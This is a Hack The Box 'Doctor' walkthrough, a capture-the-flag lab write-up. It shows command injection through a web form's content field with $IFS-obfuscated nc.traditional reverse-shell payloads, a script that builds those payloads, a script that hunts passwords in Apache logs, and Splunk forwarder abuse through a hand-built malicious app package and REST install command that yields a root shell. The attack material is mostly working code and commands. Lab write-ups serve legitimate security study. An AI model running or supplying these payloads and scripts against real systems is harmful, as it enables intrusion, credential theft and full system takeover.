Hack The Box - Doctor Walkthrough without Metasploit

Enumeration

We start by running the nmapAutomator script against the target:

./nmapAutomator.sh 10.10.10.209 All

The Basic Nmap Scan returns the following:

Ports

We have the following ports open:

22, 80, 8089

22

This is SSH (Secure Shell). We may be able to use it later to log in if we find a valid username together with its password or its SSH private key.

80

This is HTTP (Hypertext Transfer Protocol). As always with a web port, we run Gobuster against it:

gobuster dir -u http://10.10.10.209 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -e

Gobuster doesn't find much, but browsing the site itself and doing some manual recon reveals a hostname, doctors.htb:

Let's add doctors.htb to our /etc/hosts and perform that Gobuster scan again:

gobuster dir -u http://doctors.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -e

This time the results are much more interesting, among them /login.

We don't have any credentials to log in with yet, but the Doctor Secure Messaging page lets us register an account.

Now that we are registered, we can log in with our e-mail and password:

Once logged in, we see two things: our Profile and Posts:

We create a test post with both title and content set to test:

Now let's intercept the request with Burp and see what we can do with post creation:

We send the intercepted request to Repeater so we can experiment with the title and content fields.

Exploitation

We will try to exploit either the title or the content field in order to gain access to the box.

Foothold

Since both title and content are under our control, we start by putting a simple request to our own machine in the content field:

First, we start an HTTP server on our Kali box so we can see whether the target calls back:

python -m SimpleHTTPServer 80

So we simply put a wget to our server in the content field and, to our surprise, it gets executed: our HTTP server receives the request. If the content is being handed to a shell, what happens if, instead of fetching a test file, we make it run something else?

After playing with some bash payloads and nc, we tried nc.traditional, which (unlike the OpenBSD netcat shipped as nc on many systems) supports -e to attach a program to the connection:

wget http://<your-ip>/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'<your-ip>'$IFS'<port>')

$IFS is the shell's internal field separator, which by default expands to whitespace. Using it instead of a literal space keeps the whole payload a single URL token (a space would end the URL), while the target's shell still splits the expanded $IFS into word boundaries, so nc.traditional receives -e, /bin/bash, the IP and the port as separate arguments.

We could also gain a reverse shell with:

curl http://<your-ip>/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'<your-ip>'$IFS'<port>')

or

<img src=http://<your-ip>/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'<your-ip>'$IFS'<port>')/>
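The payload construction above, as an added example that is not part of the original walkthrough: a small POSIX shell script that builds the $IFS-separated reverse-shell URL for a given listener and shows, without touching a target, why the target's shell breaks the $IFS-joined string into separate arguments. The listener IP and port are placeholders you pass in.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: builds the $IFS
# reverse-shell payload used in the content field and demonstrates why $IFS
# works as a separator. The attacker IP and port are placeholders.

# Build the URL that goes in the content field. The target pastes the field
# into a shell command (as observed above), so the $( ... ) runs over there.
# Inside double quotes \$ keeps the dollar signs literal, so the expansion
# happens on the target and not on our box; the %s slots take our IP/port.
build_payload() {
    lhost="$1"
    lport="$2"
    printf "http://%s/\$(nc.traditional\$IFS-e\$IFS/bin/bash\$IFS'%s'\$IFS'%s')" \
        "$lhost" "$lhost" "$lport"
}

# Show what the target's shell makes of the $IFS-joined command: an unquoted
# $IFS expands to whitespace and then undergoes field splitting, so the shell
# sees three separate words (nc.traditional, -e, /bin/bash), not one token.
ifs_word_count() {
    # shellcheck disable=SC2086  (unquoted on purpose: we want the splitting)
    set -- nc.traditional$IFS-e$IFS/bin/bash
    echo "$#"
}

# Stand-alone run: print the payload for a sample listener (placeholder values)
# and the word count that proves the splitting.
build_payload 10.10.14.5 4444
echo
echo "words after \$IFS splitting: $(ifs_word_count)"
```

Paste the printed URL into the content field exactly as produced; the wget/curl/img variants above only change the prefix, the $( ... ) part is identical.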

Now we upgrade the shell to a TTY with Python:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Internal Enumeration

As soon as we get in, we see that the web user belongs to an interesting group, adm:

There are two users in /home:

So our primary target is now shaun. Since we belong to the adm group, we can read the Apache logs under /var/log/apache2:

Let's see if there's any password we can grab from there:

grep -r password

Among all the noise our own Gobuster run left in the access log (hehe), we find something interesting:
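The log search described above, as an added example that is not part of the original walkthrough: a shell function that does what the manual grep does, but prints every query-string parameter of each suspicious request so that a password typed into the wrong form field (a classic user mistake) is still surfaced. The log lines it runs over are constructed for the example, not taken from the target.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: a small credential hunter
# for Apache access logs. It keeps requests whose target mentions a
# password-like token and prints every query parameter of those requests.

hunt_creds() {
    # 1. keep only lines whose request mentions pass/password/passwd/pwd
    grep -iE 'pass(word|wd)?|pwd' |
    # 2. isolate the request target out of "METHOD /target HTTP/x.y"
    sed -E 's|^.*"[A-Z]+ ([^ "]+) HTTP/[0-9.]+".*$|\1|' |
    # 3. emit "path<TAB>key=value" per parameter; paths without a query
    #    string are still reported so nothing kept in step 1 is dropped
    awk -F'[?]' '
        NF > 1  { n = split($2, kv, "&"); for (i = 1; i <= n; i++) print $1 "\t" kv[i] }
        NF == 1 { print $1 "\t(no query string)" }
    '
}

# Constructed sample log in Apache combined format (NOT the target's real
# log): an ordinary hit, a password pasted into the email field of a reset
# request, a scanner hit, and a form that sends a password by GET.
SAMPLE_LOG='10.10.14.5 - - [05/Sep/2020:11:17:34 +0200] "GET /index.html HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
10.10.14.5 - - [05/Sep/2020:11:17:40 +0200] "GET /reset_password?email=Ex4mplePass%21 HTTP/1.1" 500 453 "-" "Mozilla/5.0"
10.10.14.5 - - [05/Sep/2020:11:18:01 +0200] "GET /login?next=%2Fhome HTTP/1.1" 200 1235 "-" "gobuster/3.1.0"
10.10.14.5 - - [05/Sep/2020:11:18:05 +0200] "GET /account?user=nurse&passwd=Tr1age-2020 HTTP/1.1" 302 0 "-" "curl/7.68.0"'

# Stand-alone run over the sample. Against a real box pipe the logs in:
#   cat /var/log/apache2/access.log* | hunt_creds
printf '%s\n' "$SAMPLE_LOG" | hunt_creds
```

Values are printed URL-encoded exactly as they appear in the log (the %21 above is a "!"), so decode before spraying. The wider lesson for the defender is the same one this box teaches: anything sent in a GET query string lands in a log that every adm member can read.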

Since we found a possible password, the first thing to do is password spraying: try it against every user we know about.

We tried root first (you never know), but it wasn't that easy; the password works for shaun instead. We can grab the user flag from his home directory.

Privilege Escalation

At the start of the enumeration we saw another open port, 8089, with Splunk running on it. A quick Google search for Splunk privilege escalation leads to the PySplunkWhisperer2 Python scripts, which abuse the Splunk Universal Forwarder: anyone with valid credentials for its management port can deploy an app, and a scripted input inside that app is executed by the forwarder with its own privileges, which here means root.

Remote Privilege Escalation

Since port 8089 is reachable from our machine, we can use the remote version of the script. The credentials are the ones we just found, reused for Splunk; --lhost is the address the script serves the app package from, so it must be reachable from the target:

python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost <your-ip> --username shaun --password Guitar123 --payload "nc.traditional -e /bin/bash '<your-ip>' '<port>'"

Internal Privilege Escalation

If port 8089 were not reachable from outside, we could still escalate privileges with the local version of the script. It doesn't work out of the box: the victim only has python3 and the script was written for python2 (it uses raw_input() and print without parentheses), so we have to change:

raw_input() --> input()

and every print has to be enclosed in (). The 2to3 tool shipped with Python (up to 3.12) makes both changes automatically if it is available.

Once those changes are made it works like a charm and sends us a reverse shell as root:
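What both versions of the script do under the hood, as an added example that is neither the PySplunkWhisperer2 code nor part of the original walkthrough: build a Splunk app package whose inputs.conf declares a scripted input, and hand it to the forwarder's management API, which fetches and installs it and then runs the script as its own user. The app name, file names, interval and the demo command are my choices for the example; the REST parameters follow Splunk's apps/local endpoint as used by the scripts, so check them against the script version you actually run.

```shell
#!/bin/sh
# Added example, not the PySplunkWhisperer2 code: rebuilds the trick those
# scripts use so the mechanism is visible. A Splunk forwarder's management
# port accepts an app package from an authenticated user; the app's
# inputs.conf can declare a "scripted input", and the forwarder runs that
# script as its own user (root on this box). Names below are my choices.

# Build <out> (a .tgz) with bin/pwn.sh holding the payload and a
# default/inputs.conf stanza telling Splunk to run it. Prints the path.
build_splunk_app() {
    name="$1"; payload="$2"; out="$3"
    work=$(mktemp -d)
    mkdir -p "$work/$name/bin" "$work/$name/default"
    printf '#!/bin/sh\n%s\n' "$payload" > "$work/$name/bin/pwn.sh"
    chmod 755 "$work/$name/bin/pwn.sh"
    # $SPLUNK_HOME must stay literal: Splunk expands it on the forwarder.
    # interval = 10 re-runs the script every 10 s, so a missed callback
    # gets another chance; disabled = 0 switches the input on.
    cat > "$work/$name/default/inputs.conf" <<EOF
[script://\$SPLUNK_HOME/etc/apps/$name/bin/pwn.sh]
disabled = 0
interval = 10
sourcetype = $name
EOF
    tar -C "$work" -czf "$out" "$name"
    rm -rf "$work"
    echo "$out"
}

# Ask the forwarder to fetch and install the package. The tarball must be
# served over HTTP at $app_url from a host the target can reach (that is
# what --lhost is for in the remote script). Not run here: needs a target.
install_splunk_app() {
    host="$1"; user="$2"; pass="$3"; app_url="$4"; name="$5"
    curl -sk -u "$user:$pass" "https://$host:8089/services/apps/local" \
        -d "name=$app_url" -d "filename=true" -d "explicit_appname=$name"
}

# Stand-alone run: build a demo package whose script only records who ran it
# (a harmless stand-in for the reverse shell used in the walkthrough).
build_splunk_app demoapp 'id > /tmp/splunk_demo_id' "${TMPDIR:-/tmp}/demoapp.tgz"
```

To use it against a box, build the package with the same nc.traditional command as the payload, serve the directory it lands in with an HTTP server, call install_splunk_app with the target, the credentials and the package URL, and keep a listener waiting; the script fires within the configured interval. Where the local variant is needed instead, the package is installed from a local path rather than a URL, which is why that version has no --lhost.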

Pwnd

We can grab our root flag:
